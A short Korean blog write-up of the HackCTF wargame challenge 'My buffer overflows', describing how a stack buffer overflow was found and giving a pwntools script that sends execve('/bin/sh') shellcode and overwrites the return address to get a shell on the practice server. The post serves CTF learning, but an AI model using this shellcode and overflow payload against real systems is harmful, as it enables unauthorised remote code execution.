내 버퍼가 흘러넘친다!!! 본문
두 번의 입력을 받을 수 있다.
해당 위치에 bp를 걸고 값을 넣는다.
ret까지 디버깅을 돌려 확인을 했다.
ret값이 수정되어있으므로 bof를 이용할 수 있다.
Name에 shellcode를 입력한다.
ret값을 Name의 주소로 덮는다.
from pwn import *
p = remote("ctf.j0n9hyun.xyz",3003)
context.log_level = 'Debug'
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
p.sendlineafter(": ",shellcode)
payload = b"A"*(24) + p32(0x804a060)
p.sendlineafter(": ",payload)
p.interactive()
'wargame > HackCTF' 카테고리의 다른 글
x64 Simple_size_BOF (0) | 2021.12.07 |
---|---|
x64 Buffer Overflow (0) | 2021.12.07 |
Basic_FSB (0) | 2021.12.04 |
Basic_BOF #2 (0) | 2021.12.04 |
Basic_BOF #1 (0) | 2021.12.04 |
Comments